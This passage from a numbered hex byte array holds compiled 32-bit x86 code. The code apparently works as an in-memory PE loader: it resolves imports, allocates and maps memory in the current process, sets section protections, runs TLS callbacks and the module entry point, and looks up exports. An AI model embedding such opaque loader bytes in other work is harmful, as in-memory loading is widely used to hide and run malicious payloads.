936 0x84, 0x00, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
937 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xdc,
938 0xe9, 0x23, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x8b, 0x50, 0x0c, 0x8b,
939 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
940 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
941 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7a, 0xe1, 0xff, 0xff, 0x89, 0x85,
942 0x78, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
943 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xdc, 0x8b,
944 0x50, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45,
945 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xc1, 0x00,
946 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79, 0x2f, 0x8b,
947 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
948 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
949 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbe, 0xde, 0xff,
950 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x7c, 0x8b, 0x45,
951 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
952 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
953 0xc0, 0x74, 0x2e, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02,
954 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57,
955 0x0b, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80,
956 0xf4, 0x00, 0x00, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb,
957 0x31, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44,
958 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85,
959 0x78, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
960 0x04, 0x24, 0xe8, 0x40, 0xde, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0,
961 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04, 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x32,
962 0xff, 0xff, 0xff, 0x90, 0x83, 0x45, 0xdc, 0x14, 0x8b, 0x45, 0xdc, 0x8b,
963 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xcf, 0xfe, 0xff, 0xff, 0x8b, 0x45,
964 0xa8, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
965 0x84, 0x00, 0x0f, 0x84, 0x1f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
966 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xd8,
967 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x04, 0x8b,
968 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
969 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
970 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1e, 0xe0, 0xff, 0xff, 0x89, 0x85,
971 0x78, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x78, 0xff, 0xff, 0xff, 0x00, 0x0f,
972 0x84, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x10, 0x8b,
973 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45,
974 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0,
975 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84,
976 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79,
977 0x2f, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
978 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
979 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x54,
980 0xdd, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x44,
981 0x8b, 0x45, 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01,
982 0xd0, 0x89, 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x74, 0xff, 0xff,
983 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
984 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
985 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0e, 0xdd, 0xff,
986 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04,
987 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x6a, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01,
988 0x90, 0x83, 0x45, 0xd8, 0x20, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x04, 0x85,
989 0xc0, 0x0f, 0x85, 0xf6, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b, 0x50,
990 0x28, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x70,
991 0xff, 0xff, 0xff, 0x8b, 0x55, 0xa8, 0x8d, 0x85, 0x44, 0xfe, 0xff, 0xff,
992 0x89, 0xd3, 0xba, 0x3e, 0x00, 0x00, 0x00, 0x89, 0xc7, 0x89, 0xde, 0x89,
993 0xd1, 0xf3, 0xa5, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
994 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89,
995 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0x85, 0x10,
996 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44,
997 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30,
998 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c,
999 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x3c, 0xff,
1000 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1001 0xff, 0xe8, 0xbe, 0x2b, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1002 0x00, 0x0f, 0x88, 0xfe, 0x08, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe,
1003 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1004 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89,
1005 0x54, 0x24, 0x08, 0x8b, 0x55, 0x8c, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04,
1006 0x24, 0xe8, 0x44, 0x25, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x48,
1007 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x6c, 0x8b, 0x45, 0x08, 0x0f,
1008 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x3f, 0x8b, 0x45,
1009 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54,
1010 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1011 0x24, 0xe8, 0xda, 0x24, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x54,
1012 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1013 0x8b, 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0xbd, 0x24, 0x00, 0x00, 0xeb,
1014 0x1f, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1015 0xff, 0x89, 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xb0,
1016 0x89, 0x04, 0x24, 0xe8, 0xca, 0x24, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f,
1017 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xb2, 0x00,
1018 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89,
1019 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
1020 0xff, 0xff, 0xe8, 0x34, 0x2a, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d,
1021 0x90, 0x00, 0x0f, 0x88, 0x1c, 0x08, 0x00, 0x00, 0x83, 0x7d, 0x94, 0x00,
1022 0x74, 0x0a, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1023 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85,
1024 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x28, 0xc7,
1025 0x44, 0x24, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00,
1026 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00, 0x00, 0x8d,
1027 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7, 0x44, 0x24,
1028 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00,
1029 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x1c,
1030 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0xff,
1031 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x91, 0x29, 0x00, 0x00, 0x89,
1032 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x97, 0x07, 0x00, 0x00,
1033 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff,
1034 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x08, 0x00, 0x00,
1035 0x00, 0x8d, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d,
1036 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1037 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd5, 0x29, 0x00, 0x00, 0x89, 0x45, 0x90,
1038 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x54, 0x07, 0x00, 0x00, 0xc7, 0x45,
1039 0xc4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x02, 0x00, 0x00, 0x8b, 0x8d,
1040 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1041 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1042 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0x50, 0xff, 0xff, 0xff, 0x8b, 0x8d,
1043 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1044 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1045 0x1f, 0x89, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x8b, 0x8d, 0x3c, 0xff, 0xff,
1046 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1,
1047 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0,
1048 0x01, 0x89, 0x85, 0x48, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x4c, 0xff, 0xff,
1049 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x74,
1050 0x0c, 0xc7, 0x45, 0xbc, 0x80, 0x00, 0x00, 0x00, 0xe9, 0xed, 0x00, 0x00,
1051 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd,
1052 0x48, 0xff, 0xff, 0xff, 0x00, 0x74, 0x0c, 0xc7, 0x45, 0xbc, 0x20, 0x00,
1053 0x00, 0x00, 0xe9, 0xcf, 0x00, 0x00, 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff,
1054 0xff, 0x00, 0x74, 0x38, 0x83, 0xbd, 0x4c, 0xff, 0xff, 0xff, 0x00, 0x74,
1055 0x2f, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x75, 0x26, 0x8b, 0x45,
1056 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x0c,
1057 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00,
1058 0xc7, 0x45, 0xbc, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00,
1059 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1060 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1061 0x00, 0x74, 0x09, 0xc7, 0x45, 0xbc, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x6a,
1062 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x1b, 0x83, 0xbd, 0x4c,
1063 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1064 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x02, 0x00, 0x00, 0x00, 0xeb, 0x46,
1065 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1066 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1067 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x22,
1068 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x19, 0x83, 0xbd, 0x4c,
1069 0xff, 0xff, 0xff, 0x00, 0x74, 0x10, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1070 0x00, 0x75, 0x07, 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x8b, 0x8d,
1071 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1072 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00,
1073 0x00, 0x00, 0x04, 0x85, 0xc0, 0x74, 0x07, 0x81, 0x4d, 0xbc, 0x00, 0x02,
1074 0x00, 0x00, 0x8b, 0x8d, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x9d, 0x3c, 0xff,
1075 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1076 0xc1, 0xe0, 0x03, 0x01, 0xd8, 0x8b, 0x40, 0x0c, 0x01, 0xc8, 0x89, 0x85,
1077 0x38, 0xfc, 0xff, 0xff, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f,
1078 0xb7, 0xc0, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xc4, 0x73, 0x43, 0x8b, 0x8d,
1079 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc4, 0x8d, 0x50, 0x01, 0x89, 0xd0,
1080 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40,
1081 0x0c, 0x89, 0xc3, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4,
1082 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8,
1083 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x89, 0xd8, 0x29, 0xd0, 0x89, 0x85, 0x34,
1084 0xfc, 0xff, 0xff, 0xeb, 0x1e, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b,
1085 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03,
1086 0x01, 0xc8, 0x8b, 0x40, 0x10, 0x89, 0x85, 0x34, 0xfc, 0xff, 0xff, 0xc7,
1087 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4,
1088 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44,
1089 0x24, 0x10, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x34,
1090 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x38, 0xfc, 0xff,
1091 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
1092 0xe8, 0x45, 0x27, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00,
1093 0x0f, 0x88, 0xc7, 0x04, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01, 0x0f, 0xb7,
1094 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xc4, 0x0f,
1095 0x82, 0x65, 0xfd, 0xff, 0xff, 0xc7, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00,
1096 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x34,
1097 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85,
1098 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c,
1099 0x02, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x34, 0xfc, 0xff, 0xff, 0x89, 0x44,
1100 0x24, 0x08, 0x8d, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1101 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd2, 0x26, 0x00, 0x00,
1102 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x57, 0x04, 0x00,
1103 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1104 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1105 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5f, 0x27, 0x00, 0x00,
1106 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x2a, 0x04, 0x00,
1107 0x00, 0x8b, 0x85, 0x04, 0xff, 0xff, 0xff, 0x89, 0x45, 0x84, 0x83, 0x7d,
1108 0x84, 0x00, 0x74, 0x57, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0xc2,
1109 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b,
1110 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd4, 0x83,
1111 0x7d, 0xd4, 0x00, 0x74, 0x32, 0xeb, 0x27, 0x8b, 0x45, 0xd4, 0x8b, 0x00,
1112 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1113 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14,
1114 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x45, 0xd4, 0x04, 0x8b, 0x45,
1115 0xd4, 0x8b, 0x00, 0x85, 0xc0, 0x75, 0xd0, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1116 0x83, 0xf8, 0x03, 0x0f, 0x85, 0xd9, 0x01, 0x00, 0x00, 0x8b, 0x95, 0x6c,
1117 0xfe, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
1118 0x85, 0x68, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0xc7,
1119 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01,
1120 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff,
1121 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c,
1122 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xbb, 0x02, 0x00, 0x00, 0x8b,
1123 0x85, 0xbc, 0xfe, 0xff, 0xff, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc,
1124 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x64,
1125 0xff, 0xff, 0xff, 0x83, 0x7d, 0x84, 0x00, 0x0f, 0x84, 0x95, 0x02, 0x00,
1126 0x00, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x18, 0x89, 0x45,
1127 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x84, 0x7f, 0x02, 0x00, 0x00, 0x8b,
1128 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x1c, 0x8b, 0x85, 0x1c, 0xfc,
1129 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x85,
1130 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x20, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1131 0xff, 0x01, 0xd0, 0x89, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x64,
1132 0xff, 0xff, 0xff, 0x8b, 0x50, 0x24, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
1133 0x01, 0xd0, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc0, 0x05,
1134 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
1135 0x85, 0x5c, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
1136 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x54, 0xff, 0xff, 0xff, 0x8b,
1137 0x45, 0x0c, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1138 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2b, 0x20, 0x00,
1139 0x00, 0x85, 0xc0, 0x75, 0x37, 0x8b, 0x45, 0xc0, 0x05, 0xff, 0xff, 0xff,
1140 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x85, 0x58, 0xff, 0xff, 0xff, 0x01, 0xd0,
1141 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1142 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1143 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0xeb, 0x0e,
1144 0x83, 0x6d, 0xc0, 0x01, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x85, 0x76, 0xff,
1145 0xff, 0xff, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xa5, 0x01, 0x00, 0x00,
1146 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0,
1147 0x74, 0x5c, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85,
1148 0xc0, 0x74, 0x22, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00,
1149 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
1150 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3e, 0xd4, 0xff,
1151 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
1152 0x74, 0x08, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0xeb, 0x08, 0x8b, 0x45,
1153 0x0c, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8,
1154 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0x3c, 0x01, 0x00, 0x00, 0x8b, 0x45,
1155 0xc8, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0xff, 0xd0, 0xe9, 0x2c, 0x01,
1156 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
1157 0x84, 0xc0, 0x74, 0x37, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00,
1158 0x00, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89,
1159 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xd1, 0xd3,
1160 0xff, 0xff, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
